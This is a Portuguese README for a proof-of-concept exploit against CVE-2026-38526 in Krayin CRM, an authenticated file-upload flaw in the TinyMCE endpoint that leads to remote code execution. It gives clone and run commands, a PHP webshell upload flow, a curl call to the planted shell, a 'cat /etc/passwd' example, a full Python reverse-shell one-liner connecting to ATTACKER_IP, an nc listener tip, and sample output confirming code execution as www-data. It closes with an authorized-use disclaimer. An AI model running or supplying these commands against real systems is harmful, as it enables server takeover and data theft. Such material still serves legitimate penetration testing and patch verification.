
# Exploit automatizado para Krayin CRM ≤ 2.2.x.
Exploit automatizado para Krayin CRM ≤ 2.2.x. Este script explora uma vulnerabilidade de upload de arquivo irrestrito no endpoint TinyMCE (/admin/tinymce/upload), contorna a validação do tipo MIME falsificando image/jpeg, faz upload de um webshell PHP e executa comandos arbitrários com privilégios do servidor web.
| Propriedade | Valor |
|---|---|
| ID CVE | CVE-2026-38526 |
| Software Afetado | Krayin CRM ≤ 2.2.x |
| Tipo de Vulnerabilidade | Upload de Arquivo Irrestrito → Execução Remota de Código |
| Autenticação | Necessária (qualquer conta de admin válida) |
| Endpoint | POST /admin/tinymce/upload |
requestsgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
| Flag | Descrição | Exemplo |
|---|---|---|
-i | URL alvo (com ou sem http://) | http://target.com ou target.com |
-u | E-mail/nome de usuário do admin | [email protected] |
-p | Senha do admin | AdminPassword123! |
-c | Comando a executar (padrão: id) | whoami |
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload com tipo MIME falsificado[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
Falha na Autenticação: Verifique se as credenciais estão corretas e se a conta existe no alvo.
Falha na Extração do Token CSRF: Certifique-se de que o alvo está executando o Krayin CRM vulnerável e que o endpoint de login está acessível.
Reverse Shell Não Conectando: Certifique-se de que seu listener está em execução (nc -lvnp <PORT>), que as regras de firewall permitem conexões de saída e que o IP/porta no payload estão corretos.
Esta ferramenta é fornecida estritamente para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Os usuários são os únicos responsáveis por garantir que possuem autorização adequada antes de testar qualquer sistema alvo. O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.
b0nyo - Implementação do PoC
TREXNEGRO - Descoberta da Vulnerabilidade